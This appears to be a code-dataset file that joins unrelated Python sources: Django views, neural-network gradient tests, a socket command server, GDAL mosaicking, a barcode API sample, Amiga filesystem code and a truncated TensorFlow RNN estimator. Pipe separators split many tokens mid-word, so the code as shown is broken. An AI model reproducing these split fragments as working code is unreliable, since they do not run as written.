header_list = ['Owner', 'Acct', 'Create Date', 'Shipment', 'Quantity', 'Status']
if order.status == 4:
header_list.index('Complete Date', 3)
context_dict['headers'] = header_list
context_dict['order'] = order
context_dict['orderop_headers'] = ['Op ID', 'Time', 'Status', 'User']
return render_to_response('tracker/workorder_detail.html', context_dict, context)
@login_required
def remove_work_order (request, id):
try:
order = WorkOrder.objects.get(id = id)
order.remove_order()
messages.add_message(request, messages.SUCCESS, "Order {} removed.".format(order.id))
except WorkOrder.DoesNotExist:
messages.add_message(request, messages.ERROR, "Can't find any Work Order with ID {}".format(id))
return HttpResponseRedirect(reverse('work_order_list', args = ['incomplete']))
@login_required
def link_work_order (request, orderid):
"""
Function to handle linking WorkOrder and Shipment objects
"""
if request. | method != 'POST':
return HttpResponseRedirect(reverse('work_orders'))
else:
# TODO: Alert the user t | o discrepancies b/w the Work Order and the Shipment (i.e. different quantity)
order = WorkOrder.objects.get(id = orderid)
ship_desc = request.POST.get('shipid')
ship_id = re.findall('#(\d+):', ship_desc)[0]
shipment = Shipment.objects.get(shipid = ship_id)
order.shipment = shipment
order.save()
messages.add_message(request, messages.SUCCESS, "Order {0} and Shipment {1} linked successfully.".format(
order.id, shipment.shipid
))
return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
@csrf_exempt
def get_unmatched_shipments (request, order_id):
"""
AJAX function to list Shipments that have no associated Work Order.
Returns shipments belonging to a particular Customer (order owner)
that are unmatched and still in storage (redundant?)
"""
context_dict = dict()
order = WorkOrder.objects.get(id = order_id)
_owner = order.owner
_list = Shipment.objects.exclude(status = 4) \
.filter(owner = _owner) \
.exclude(_workorder__isnull = False)
context_dict['list'] = [str(shipment) for shipment in _list]
return HttpResponse(json.dumps(context_dict), content_type = 'application/json')
@csrf_exempt
def get_unmatched_orders (request, ship_id):
"""
AJAX function to list Work Orders that have no associated Shipment.
Returns Work Orders belonging to a particular Customer (shipment owner)
that are unmatched and not deleted
"""
# TODO: Method to get unmatched orders by Acct ID
context_dict = dict()
shipment = Shipment.objects.get(shipid = ship_id)
_owner = shipment.owner
_list = WorkOrder.objects.exclude(status = 999) \
.filter(owner = _owner) \
.exclude(shipment__isnull = False)
context_dict['list'] = [str(order) for order in _list]
return HttpResponse(json.dumps(context_dict), content_type = 'application/json')
|
cgpotts/cs224u | test/test_np_model_gradients.py | Python | apache-2.0 | 7,151 | 0.000699 | from nltk.tree import Tree
from np_shallow_neural_classifier import ShallowNeuralClassifier
from np_rnn_classifier import RNNClassifier
from np_autoencoder import Autoencoder
from np_tree_nn import TreeNN
import numpy as np
import pytest
import utils
__author__ = "Christopher Potts"
__version__ = "CS224u, Stanford, Spring 2021"
utils.fix_random_seeds()
class GradientCheckError(Exception):
"""Raised if a gradient check fails."""
@pytest.mark.parametrize("hidden_activation, d_hidden_activation", [
[np.tanh, utils.d_tanh],
[utils.relu, utils.d_relu]
])
def test_np_shallow_neural_classifier_gradients(hidden_activation, d_hidden_activation):
model = ShallowNeuralClassifier(
max_iter=10,
hidden_activation=hidden_activation,
d_hidden_activation=d_hidden_activation)
# A tiny dataset so that we can run `fit` and set all the model
# parameters:
X = utils.randmatrix(5, 2)
y = np.random.choice((0,1), 5)
model.fit(X, y)
# Use the first example for the check:
ex = X[0]
label = model._onehot_encode([y[0]])[0]
# Forward and backward to get the gradients:
hidden, pred = model.forward_propagation(ex)
d_W_hy, d_b_hy, d_W_xh, d_b_xh = model.backward_propagation(
hidden, pred, ex, label)
# Model parameters to check:
param_pairs = (
('W_hy', d_W_hy),
('b_hy', d_b_hy),
('W_xh', d_W_xh),
('b_xh', d_b_xh)
)
gradient_check(param_pairs, model, ex, label)
@pytest.mark.parametrize("hidden_activation, d_hidden_activation", [
[np.tanh, utils.d_tanh],
[utils.relu, utils.d_relu]
])
def test_np_rnn_classifier(hidden_activation, d_hidden_activation):
# A tiny dataset so that we can run `fit` and set all the model
# parameters:
vocab = ['a', 'b', '$UNK']
data = [
[list('ab'), 'good'],
[list('aab'), 'good'],
[list('abb'), 'good']]
model = RNNClassifier(
vocab,
max_iter=10,
hidden_dim=2,
hidden_activation=hidden_activation,
d_hidden_activation=d_hidden_activation)
X, y = zip(*data)
model.fit(X, y)
# Use the first example for the check:
ex = X[0]
label = model._onehot_encode([y[0]])[0]
# Forward and backward to get the gradients:
hidden, pred = model.forward_propagation(ex)
d_W_hy, d_b, d_W_hh, d_W_xh = model.backward_propagation(
hidden, pred, ex, label)
# Model parameters to check:
param_pairs = (
('W_xh', d_W_xh),
('W_hh', d_W_hh),
('W_hy', d_W_hy),
('b', d_b)
)
gradient_check(param_pairs, model, ex, label)
@pytest.mark.parametrize("hidden_activation, d_hidden_activation", [
[np.tanh, utils.d_tanh],
[utils.relu, utils.d_relu]
])
def test_np_autoencoder(hidden_activation, d_hidden_activation):
model = Autoencoder(
max_iter=10,
hidden_dim=2,
hidden_activation=hidden_activation,
d_hidden_activation=d_hidden_activation)
# A tiny dataset so that we can run `fit` and set all the model
# parameters:
X = utils.randmatrix(5, 5)
model.fit(X)
# Use the first example for the check:
ex = X[0]
label = X[0]
# Forward and backward to get the gradients:
hidden, pred = model.forward_propagation(ex)
d_W_hy, d_b_hy, d_W_xh, d_b_xh = model.backward_propagation(
hidden, pred, ex, label)
# Model parameters to check:
param_pairs = (
('W_hy', d_W_hy),
('b_hy', d_b_hy),
('W_xh', d_W_xh),
('b_xh', d_b_xh)
)
gradient_check(param_pairs, model, ex, label)
@pytest.mark.parametrize("hidden_activation, d_hidden_activation", [
[np.tanh, utils.d_tanh],
[utils.relu, utils.d_relu]
])
def test_np_tree_nn(hidden_activation, d_hidden_activation):
# A tiny dataset so that we can run `fit` and set all the model
# parameters:
vocab = ["1", "+", "2"]
X = [
"(even (odd 1) (neutral (neutral +) (odd 1)))",
"(odd (odd 1) (neutral (neutral +) (even 2)))"]
X = [Tree.fromstring(ex) for ex in X]
y = [tree.label() for tree in X]
model = TreeNN(
vocab,
max_iter=10,
hidden_dim=5,
hidden_activation=hidden_activation,
d_hidden_activation=d_hidden_activation)
model.fit(X, y)
# Use the first example for the check:
ex = X[0]
label = model._onehot_encode([ex.label()])[0]
# Forward and backward to get the gradients:
hidden, pred = model.forward_propagation(ex)
d_W_hy, d_b_y, d_W, d_b = model.backward_propagation(
hidden, pred, ex, label)
# Model parameters to check:
param_pairs = (
('W_hy', d_W_hy),
('b_y', d_b_y),
('W', d_W),
('b', d_b)
)
gradient_check(param_pairs, model, ex, label)
def gradient_check(param_pairs, model, ex, label, epsilon=0.0001, threshold=0.001):
"""
Numerical gradient check following the method described here:
http://ufldl.stanford.edu/wiki/index.php/Gradient_checking_and_advanced_optimization
Parameters
----------
param_pairs : list of str, np.aray pairs
In each pair, the first is the name of the parameter to check,
and the second is its purported derivatives. We use the name
as the first pair so that we can raise an informative error
message in the case of a failure.
model : trained model instance
This should have attributes for all of the parameters named in
`param_pairs`, and it must have methods `forward_propagation`,
and `get_error`.
ex : an example that `model` can process
label : a label vector that `model` can learn from directly
epsilon : float
The small constant by which the parameter values are changed.
threshold : float
Tolerance for raising an error.
Raises
------
GradientCheckError
" | ""
for param_name, d_params in param_pairs:
params = getattr(model, param_name)
# This iterator will allow is to cycle over all the values for
# arra | ys of any dimension:
iterator = np.nditer(params, flags=['multi_index'], op_flags=['readwrite'])
while not iterator.finished:
idx = iterator.multi_index
actual = params[idx]
params[idx] = actual + epsilon
_, pred = model.forward_propagation(ex)
grad_pos = model.get_error(pred, label)
params[idx] = actual - epsilon
_, pred = model.forward_propagation(ex)
grad_neg = model.get_error(pred, label)
grad_est = (grad_pos - grad_neg) / (epsilon * 2.0)
params[idx] = actual
grad_bp = d_params[idx]
# Relative error to control for differences in proportion
# across parameter values:
err = np.abs(grad_bp - grad_est) / (np.abs(grad_bp) + np.abs(grad_est))
if err >= threshold:
raise GradientCheckError(
"Gradient check error for {} at {}: error is {}".format(
param_name, idx, err))
iterator.iternext()
|
mustafa-cosar/ceng445Project | src/ApplicationProcess.py | Python | gpl-3.0 | 4,252 | 0.004468 | from multiprocessing import *
from ceng445 import *
import json
import traceback
STATUS_OK = 'OK'
STATUS_FAIL = 'FAIL'
class ApplicationProcess(Process):
def __init__(self, connectionInfo):
super(ApplicationProcess, self).__init__()
self._conn = connectionInfo[0]
self._addr = connectionInfo[1]
self._app = Application()
def run(self):
print("Connection established with pair: ", self._conn)
try:
while self._conn:
receivedData = self._conn.recv(65536).decode('utf-8')
command = json.loads(receivedData)
result = json.dumps(self.handle(comm | and), indent='\t')
self._conn.send(result.encode('utf-8'))
except:
print("Connection closed! with pair: ", self._conn)
self._conn.close()
def handle(self, cmd):
result = {}
command = cmd.get | ('command', None)
print(cmd)
if command == 'available':
try:
result['result'] = self._app.available()
result['status'] = STATUS_OK
except:
result['status'] = STATUS_FAIL
elif command == 'loaded':
try:
result['result'] = self._app.loaded()
result['status'] = STATUS_OK
except:
result['status'] = STATUS_FAIL
elif command == 'load':
try:
result['result'] = self._app.load(cmd['args']['name'])
result['status'] = STATUS_OK
except:
result['status'] = STATUS_FAIL
elif command == 'instances':
try:
result['result'] = self._app.instances()
result['status'] = STATUS_OK
except:
result['status'] = STATUS_FAIL
elif command == 'addInstance':
try:
result['result'] = self._app.addInstance(cmd['args']['componentName'], cmd['args']['x'], cmd['args']['y'])
result['status'] = STATUS_OK
except:
result['status'] = STATUS_FAIL
elif command == 'removeInstance':
try:
result['result'] = self._app.removeInstance(cmd['args']['id'])
result['status'] = STATUS_OK
except:
result['status'] = STATUS_FAIL
elif command == 'callMethod':
try:
params = tuple(cmd['args']['params'])
params = None if params == () else self._getParams(params)
if params == None:
result['result'] = self._app.callMethod(cmd['args']['id'], cmd['args']['methodName'], None)
else:
result['result'] = self._app.callMethod(cmd['args']['id'], cmd['args']['methodName'], *params)
result['status'] = STATUS_OK
except:
traceback.print_exc()
result['status'] = STATUS_FAIL
elif command == 'saveDesign':
try:
result['result'] = self._app.saveDesign(cmd['args']['path'])
result['status'] = STATUS_OK
except:
traceback.print_exc()
result['status'] = STATUS_FAIL
elif command == 'loadDesign':
try:
result['result'] = self._app.loadDesign(cmd['args']['path'])
result['status'] = STATUS_OK
except:
result['status'] = STATUS_FAIL
elif command == 'execute':
try:
result['result'] = self._app.execute()
result['status'] = STATUS_OK
except:
result['status'] = STATUS_FAIL
else:
result['result'] = 'Available Commands: '
result['status'] = STATUS_OK
return result
def _getParams(self, params):
#TODO: Does not cover all possible cases. Improve it later
retVal = []
for i in params:
if type(i) == type({}) and i.get('__factory__', None) == True:
retVal.append(Factory().createInstance(i['name']))
else:
retVal.append(i)
return tuple(retVal)
|
bmenard1/GroundSurveyor | ground_surveyor/uf_mosaic.py | Python | apache-2.0 | 5,019 | 0.003188 | import os
import json
import logging
import numpy
from osgeo import gdal
from ground_surveyor import gsconfig
def pick_best_pile_layer(pile_md_filename,
selection_options):
pile_md = json.load(open(pile_md_filename))
best_i = -1
best_value = 0
target_field = selection_options.get('order_field',
'normalized_sharpness')
cc_threshold = selection_options.get('cross_correlation_threshold',
None)
small_cc_threshold = selection_options. | get(
'small_cross_correlation_threshold',
None | )
zero_threshold = selection_options.get('zero_threshold',
None)
for i in range(len(pile_md['sharpness'])):
if cc_threshold is not None:
cc_raw = pile_md['cross_correlation_raw'][i]
if cc_raw < cc_threshold:
continue
if small_cc_threshold is not None:
small_cc = pile_md['cross_correlation_small'][i]
if small_cc < small_cc_threshold:
continue
if zero_threshold is not None and pile_md['n_pixel_at_zero_intensity'][i] > zero_threshold:
continue
if target_field == 'normalized_sharpness':
target_value = pile_md['sharpness'][i] \
/ pile_md['intensity_median'][i]
else:
target_value = pile_md[target_field]
if target_value > best_value:
best_value = target_value
best_i = i
# If nothing met the threshold, try again without the threshold.
if best_i == -1 and cc_threshold is not None:
for i in range(len(pile_md['sharpness'])):
if zero_threshold is not None and pile_md['n_pixel_at_zero_intensity'][i] > zero_threshold:
continue
if target_field == 'normalized_sharpness':
target_value = pile_md['sharpness'][i] \
/ pile_md['intensity_median'][i]
else:
target_value = pile_md[target_field]
if target_value > best_value:
best_value = target_value
best_i = i
logging.debug('Picked input metatile %d for pile %s with %s value of %s.',
best_i,
os.path.basename(pile_md_filename)[:15],
target_field, best_value)
return best_i
def get_pile_layer(pile_md_filename, i_file):
raw_filename = pile_md_filename.replace('_datacube_metadata.json',
'_raw.tif')
raw_ds = gdal.Open(raw_filename)
return raw_ds.GetRasterBand(i_file+1).ReadAsArray()
def merge_pile_into_mosaic(mosaic_ds,
pile_md_filename,
selected_i,
selected_img,
processing_options):
pile_parts = os.path.basename(pile_md_filename).split('_')[0:3]
assert pile_parts[0] == 'uf'
uf_i = int(pile_parts[1])
uf_j = int(pile_parts[2])
if processing_options.get('normalize_intensity',False):
pile_md = json.load(open(pile_md_filename))
selected_img = selected_img * 1000.0 \
/ pile_md['intensity_median'][selected_i]
mosaic_ds.GetRasterBand(1).WriteArray(
selected_img, uf_i * 256, uf_j * 256)
alpha_band = mosaic_ds.GetRasterBand(mosaic_ds.RasterCount)
if alpha_band.GetColorInterpretation() == gdal.GCI_AlphaBand:
if alpha_band.DataType == gdal.GDT_UInt16:
opaque = 65535
else:
opaque = 255
alpha_band.WriteArray(
numpy.ones(selected_img.shape) * opaque,
uf_i * 256, uf_j * 256)
def make_metatile(pile_directory):
mosaic_filename = os.path.join(pile_directory,'mosaic.tif')
mosaic_ds = gdal.GetDriverByName('GTiff').Create(
mosaic_filename, 4096, 4096, 1, gdal.GDT_UInt16)
# TODO: Try to add georeferencing...
return mosaic_filename, mosaic_ds
def mosaic_metatile(pile_directory,
selection_options,
processing_options={}):
mosaic_filename, mosaic_ds = make_metatile(pile_directory)
counter = 0
for filename in os.listdir(pile_directory):
if (not filename.startswith('uf_')) or (not filename.endswith('_metadata.json')):
continue
pile_md_filename = os.path.join(pile_directory, filename)
i_file = pick_best_pile_layer(pile_md_filename, selection_options)
if i_file >= 0:
selected_img = get_pile_layer(pile_md_filename, i_file)
merge_pile_into_mosaic(mosaic_ds, pile_md_filename,
i_file, selected_img,
processing_options)
counter += 1
logging.info('%d piles contributed to making %s.',
counter, mosaic_filename)
return mosaic_filename
|
appsembler/mayan_appsembler | apps/ocr/parsers/exceptions.py | Python | gpl-3.0 | 218 | 0 | class ParserError(Exception):
"""
Raised when a text parser fails to understand a file it been passed
| or the resulting parsed text is invalid
"""
pass
class Pars | erUnknownFile(Exception):
pass
|
bytescout/ByteScout-SDK-SourceCode | Cloud API Server/Barcode Reader API/Python/Read Barcode From Uploaded File/ReadBarcodeFromUploadedFile.py | Python | apache-2.0 | 3,125 | 0.00736 | import os
import requests # pip install requests
# Please NOTE: In this sample we're assuming Cloud Api Server is hosted at "https://localhost".
# If it's not then please replace this with with your hosting url.
# Base URL for PDF.co Web API requests
BASE_URL = "https://localhost"
# Source file name
SourceFile = ".\\sample.pdf"
# Comma-separated list of barcode types to search.
# See valid barcode types in the documentation https://app.pdf.co/documentation/api/1.0/barcode/read_from_url.html
BarcodeTypes = "Code128,Code39,Interleaved2of5,EAN13"
# Comma-separated list of page indices (or ranges) to process. Leave empty for all pages. Example: '0,2-5,7-'.
Pages = ""
def main(args = None):
uploadedFileUrl = uploadFile(SourceFile)
if (uploadedFileUrl != None):
readBarcodes(uploadedFileUrl)
def readBarcodes(uploadedFileUrl):
"""Get Barcode Information using PDF.co Web API"""
# Prepare URL for 'Barcode Reader' API request
url = "{}/barcode/read/from/url?types={}&pages={}&url={}".format(
BASE_URL,
BarcodeTypes,
Pages,
uploadedFileUrl
)
# Execute request and get response as JSON
response = requests.get(url, headers={ "content-type": "application/octet-stream" })
if (response.status_code == 200):
json = response.json()
if json["error"] == False:
# Display information
for barcode in json["barcodes"]:
print("Found barcode:")
print(f" Type: {barco | de['TypeName']}")
print(f" Value: {barcode['Value']}")
print(f" Document Page Index: {barcode['Page']}")
print(f" Rectangle: {barcode['Rect']}")
print(f" Confidence: {barcode['Confidence']}")
print("")
| else:
# Show service reported error
print(json["message"])
else:
print(f"Request error: {response.status_code} {response.reason}")
def uploadFile(fileName):
"""Uploads file to the cloud"""
# 1. RETRIEVE PRESIGNED URL TO UPLOAD FILE.
# Prepare URL for 'Get Presigned URL' API request
url = "{}/file/upload/get-presigned-url?contenttype=application/octet-stream&name={}".format(
BASE_URL, os.path.basename(fileName))
# Execute request and get response as JSON
response = requests.get(url)
if (response.status_code == 200):
json = response.json()
if json["error"] == False:
# URL to use for file upload
uploadUrl = json["presignedUrl"]
# URL for future reference
uploadedFileUrl = json["url"]
# 2. UPLOAD FILE TO CLOUD.
with open(fileName, 'rb') as file:
requests.put(uploadUrl, data=file, headers={ "content-type": "application/octet-stream" })
return uploadedFileUrl
else:
# Show service reported error
print(json["message"])
else:
print(f"Request error: {response.status_code} {response.reason}")
return None
if __name__ == '__main__':
main() |
RexFuzzle/sfepy | tests/test_hyperelastic_tlul.py | Python | bsd-3-clause | 3,003 | 0.00333 | input_names = {'TL': '../examples/large_deformation/hyperelastic.py',
'UL': '../examples/large_deformation/hyperelastic_ul.py',
'ULM': '../examples/large_deformation/hyperelastic_ul_up.py'}
output_name_trunk = 'test_hyperelastic_'
from sfepy.base.testing import TestCommon
from tests_basic import NLSStatus
class Test(TestCommon):
@staticmethod
def from_conf(conf, options):
return Test(conf = conf, options = options)
def test_solution(self):
from sfepy.base.base import Struct
from sfepy.base.conf import ProblemConf, get_standard_keywords
from sfepy.applications import solve_pde, assign_standard_hooks
import numpy as nm
import os.path as op
solutions = {}
ok = True
for hp, pb_filename in input_names.iteritems():
required, other = get_standard_keywords()
input_name = op.join(op.dirname(__file__), pb_filename)
test_conf = ProblemConf.from_file(input_name, required, other)
| name = output_name_trunk + hp
solver_options = Struct(output_filename_trunk=name,
output_format='vtk',
save_ebc=False, save_ebc_nodes=False,
save_regions=False,
save_regions_as_groups=False,
save_field_meshes=False,
solve_not=False)
| assign_standard_hooks(self, test_conf.options.get, test_conf)
self.report( 'hyperelastic formulation: %s' % (hp, ) )
status = NLSStatus(conditions=[])
pb, state = solve_pde(test_conf,
solver_options,
nls_status=status,
output_dir=self.options.out_dir,
step_hook=self.step_hook,
post_process_hook=self.post_process_hook,
post_process_hook_final=self.post_process_hook_final)
converged = status.condition == 0
ok = ok and converged
solutions[hp] = state.get_parts()['u']
self.report('%s solved' % input_name)
rerr = 1.0e-3
aerr = nm.linalg.norm(solutions['TL'], ord=None) * rerr
self.report('allowed error: rel = %e, abs = %e' % (rerr, aerr))
ok = ok and self.compare_vectors(solutions['TL'], solutions['UL'],
label1='TLF',
label2='ULF',
allowed_error=rerr)
ok = ok and self.compare_vectors(solutions['UL'], solutions['ULM'],
label1='ULF',
label2='ULF_mixed',
allowed_error=rerr)
return ok
|
paramsingh/backpage | backpage/urls.py | Python | mit | 315 | 0.015873 | fr | om django.conf.urls import patterns, include, url
from django.contrib import admin
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'backpage.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^admin/', include(admin.site.urls)),
url(r'^app/', incl | ude('app.urls'))
) |
alpine9000/amiga_examples | tools/external/amitools/amitools/fs/block/UserDirBlock.py | Python | bsd-2-clause | 2,641 | 0.009466 | import time
from Block import Block
from ..ProtectFlags import ProtectFlags
class UserDirBlock(Block):
def __init__(self, blkdev, blk_num):
Block.__init__(self, blkdev, blk_num, is_type=Block.T_SHORT, is_sub_type=Block.ST_USERDIR)
def set(self, data):
self._set_data(data)
self._read()
def read(self):
self._read_data()
self._read()
def _read(self):
Block.read(self)
if not self.valid:
return False
# UserDir fields
self.own_key = self._get_long(1)
self.protect = self._get_long(-48)
self.comment = self._get_bstr(-46, 79)
self.mod_ts = self._get_timestamp(-23)
self.name = self._get_bstr(-20, 30)
self.hash_chain = self._get_long(-4)
self.parent = self._get_long(-3)
self.extension = self._get_long(-2)
# hash table of entries
self.hash_table = []
self.hash_size = self.blkdev.block_longs - 56
for i in xrange(self.hash_size):
self.hash_table.append(self._get_long(6+i))
self.valid = (self.own_key == self.blk_num)
return self.valid
def create(self, parent, name, protect=0, comment=None, mod_ts=None, hash_chain=0, extension=0):
Block.create(self)
self.own_key = self.blk_num
self.protect = protect
if comment == None:
self.comment = ''
else:
self.comment = comment
# timestamps
self.mod_ts = mod_ts
self.name = name
self.hash_chain = hash_chain
self.parent = parent
self.extension = extension
# empty hash table
self.hash_table = []
self.hash_size = self.blkdev.block_longs - 56
for i in xrange(self.hash_size):
self.hash_table.append(0)
self.valid = True
return True
def write(self):
Block._create_data(self)
self._put_long(1, self.own_key)
self._put_long(-48, self.protect)
self._put_bstr(-46, 79, self.comment)
self._put_timestamp(-23, self.mod_ts)
self._put_bstr(-20, 30, self.name)
self._put_long(-4, self.hash_chain)
self._put_long(-3, self.parent)
self._put_long(-2, self.extension)
# hash table
for i in xrange(self.hash_size):
self._put_long(6+i, self.hash_table[i])
Block | .write(self)
def dump(self):
Block.dump(self,"UserDir")
print " own_key: %d" % (self.own_key)
pf = ProtectFlags(self.protect)
print " protect: 0x%x 0b%s %s" % (self.protect, pf.bin_str(), pf)
print " comment: '%s'" % self.comment
print " mod_ts: %s" % self.mod_ts
print " name: '%s'" % self.name
print " hash_ | chain: %d" % self.hash_chain
print " parent: %d" % self.parent
print " extension: %s" % self.extension
|
Toilal/roundtm | roundtm/console.py | Python | lgpl-3.0 | 1,499 | 0 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# RoundTM - A Round based Tournament Manager
# Copyright (c) 2013 Rémi Alvergnat <toilal.dev@gmail.com>
#
# RoundTM is free software; you can redistribute it and/or modify it under
# the terms of the Lesser GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# RoundTM is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# Lesser GNU General Public License for more details.
#
# You should have received a copy of the Lesser GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import unicode_literals
from .events import Event
class Console(object):
"""Controls an Event with console."""
def __ | init__(self, event):
self._eve | nt = event
@property
def next_round(self):
"""Go to next round, using the provided strategy"""
return self._event.next_round()
@property
def ranking(self):
"""Display current ranking"""
i = 1
for stat in self._event.ranking:
print "[%s] %s" % (i, stat)
i += 1
def load(path):
"""Load a project in console mode.
:return: class `Console`, a control object for console usage (IPython)
"""
return Console(Event(path))
|
Microvellum/Fluid-Designer | win64-vc/2.78/scripts/freestyle/styles/apriori_density.py | Python | gpl-3.0 | 1,743 | 0.003442 | # ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# Filename : apriori_density.py
# Author : Stephane Grabli
# Date : 04/08/2005
# Purpose : Draws lines having a high a prior density
from freestyle.chainingiterators import ChainPredicateIterator
from freestyle.predicates import (
AndUP1D,
NotUP1D,
QuantitativeInvisibilityUP1D,
TrueBP1D,
TrueUP1D,
pyHighViewMapDensityUP1D,
)
from freestyle.shaders import (
ConstantColorShader,
ConstantThicknessShader,
)
from freestyle.types import Operators
Operators.select(AndUP1D(QuantitativeInvisibilityUP1D(0), pyHighViewMapDensityUP1D(0.1,5)))
bpred = TrueBP1D()
upred = AndUP1D(QuantitativeInvisibilityUP1D(0), pyHighViewMapDensityUP1D(0.0007,5))
Operators.bidirectional_ | chain(ChainPredicateIterator(upred, bpred), NotUP1D(QuantitativeInvisibilityU | P1D(0)))
shaders_list = [
ConstantThicknessShader(2),
ConstantColorShader(0.0, 0.0, 0.0, 1.0)
]
Operators.create(TrueUP1D(), shaders_list)
|
gregvw/vector-addition | test.py | Python | mit | 180 | 0.016667 | import numpy as np
from vectoradd import printvec, addvec
if __name__ == '__main__':
n = 10
a = np.arange(n)
b = 2*n | p.flipu | d(a)
c = addvec(a,b)
printvec(c)
|
taknevski/tensorflow-xsmm | tensorflow/contrib/learn/python/learn/estimators/dynamic_rnn_estimator.py | Python | apache-2.0 | 49,250 | 0.00264 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Estimator for Dynamic RNNs."""
fro | m __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib import layers
from tensorflow.contrib import rnn as contrib_rnn
from tensorflow.contrib.framework.python.framework import deprecated
from tensorflow.contrib.layers.python.layers import optimizers
from tensorflow.contrib.learn.python.learn.estimators import constants
from tensorflow.contrib.learn.python.learn.es | timators import estimator
from tensorflow.contrib.learn.python.learn.estimators import model_fn
from tensorflow.contrib.learn.python.learn.estimators import prediction_key
from tensorflow.contrib.learn.python.learn.estimators import rnn_common
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import rnn
from tensorflow.python.training import momentum as momentum_opt
from tensorflow.python.util import nest
# TODO(jtbates): Remove PredictionType when all non-experimental targets which
# depend on it point to rnn_common.PredictionType.
class PredictionType(object):
SINGLE_VALUE = 1
MULTIPLE_VALUE = 2
def _get_state_name(i):
"""Constructs the name string for state component `i`."""
return '{}_{}'.format(rnn_common.RNNKeys.STATE_PREFIX, i)
def state_tuple_to_dict(state):
"""Returns a dict containing flattened `state`.
Args:
state: A `Tensor` or a nested tuple of `Tensors`. All of the `Tensor`s must
have the same rank and agree on all dimensions except the last.
Returns:
A dict containing the `Tensor`s that make up `state`. The keys of the dict
are of the form "STATE_PREFIX_i" where `i` is the place of this `Tensor`
in a depth-first traversal of `state`.
"""
with ops.name_scope('state_tuple_to_dict'):
flat_state = nest.flatten(state)
state_dict = {}
for i, state_component in enumerate(flat_state):
state_name = _get_state_name(i)
state_value = (None if state_component is None
else array_ops.identity(state_component, name=state_name))
state_dict[state_name] = state_value
return state_dict
def dict_to_state_tuple(input_dict, cell):
"""Reconstructs nested `state` from a dict containing state `Tensor`s.
Args:
input_dict: A dict of `Tensor`s.
cell: An instance of `RNNCell`.
Returns:
If `input_dict` does not contain keys 'STATE_PREFIX_i' for `0 <= i < n`
where `n` is the number of nested entries in `cell.state_size`, this
function returns `None`. Otherwise, returns a `Tensor` if `cell.state_size`
is an `int` or a nested tuple of `Tensor`s if `cell.state_size` is a nested
tuple.
Raises:
ValueError: State is partially specified. The `input_dict` must contain
values for all state components or none at all.
"""
flat_state_sizes = nest.flatten(cell.state_size)
state_tensors = []
with ops.name_scope('dict_to_state_tuple'):
for i, state_size in enumerate(flat_state_sizes):
state_name = _get_state_name(i)
state_tensor = input_dict.get(state_name)
if state_tensor is not None:
rank_check = check_ops.assert_rank(
state_tensor, 2, name='check_state_{}_rank'.format(i))
shape_check = check_ops.assert_equal(
array_ops.shape(state_tensor)[1],
state_size,
name='check_state_{}_shape'.format(i))
with ops.control_dependencies([rank_check, shape_check]):
state_tensor = array_ops.identity(state_tensor, name=state_name)
state_tensors.append(state_tensor)
if not state_tensors:
return None
elif len(state_tensors) == len(flat_state_sizes):
dummy_state = cell.zero_state(batch_size=1, dtype=dtypes.bool)
return nest.pack_sequence_as(dummy_state, state_tensors)
else:
raise ValueError(
'RNN state was partially specified.'
'Expected zero or {} state Tensors; got {}'.
format(len(flat_state_sizes), len(state_tensors)))
def _concatenate_context_input(sequence_input, context_input):
"""Replicates `context_input` accross all timesteps of `sequence_input`.
Expands dimension 1 of `context_input` then tiles it `sequence_length` times.
This value is appended to `sequence_input` on dimension 2 and the result is
returned.
Args:
sequence_input: A `Tensor` of dtype `float32` and shape `[batch_size,
padded_length, d0]`.
context_input: A `Tensor` of dtype `float32` and shape `[batch_size, d1]`.
Returns:
A `Tensor` of dtype `float32` and shape `[batch_size, padded_length,
d0 + d1]`.
Raises:
ValueError: If `sequence_input` does not have rank 3 or `context_input` does
not have rank 2.
"""
seq_rank_check = check_ops.assert_rank(
sequence_input,
3,
message='sequence_input must have rank 3',
data=[array_ops.shape(sequence_input)])
seq_type_check = check_ops.assert_type(
sequence_input,
dtypes.float32,
message='sequence_input must have dtype float32; got {}.'.format(
sequence_input.dtype))
ctx_rank_check = check_ops.assert_rank(
context_input,
2,
message='context_input must have rank 2',
data=[array_ops.shape(context_input)])
ctx_type_check = check_ops.assert_type(
context_input,
dtypes.float32,
message='context_input must have dtype float32; got {}.'.format(
context_input.dtype))
with ops.control_dependencies(
[seq_rank_check, seq_type_check, ctx_rank_check, ctx_type_check]):
padded_length = array_ops.shape(sequence_input)[1]
tiled_context_input = array_ops.tile(
array_ops.expand_dims(context_input, 1),
array_ops.concat([[1], [padded_length], [1]], 0))
return array_ops.concat([sequence_input, tiled_context_input], 2)
def build_sequence_input(features,
sequence_feature_columns,
context_feature_columns,
weight_collections=None,
scope=None):
"""Combine sequence and context features into input for an RNN.
Args:
features: A `dict` containing the input and (optionally) sequence length
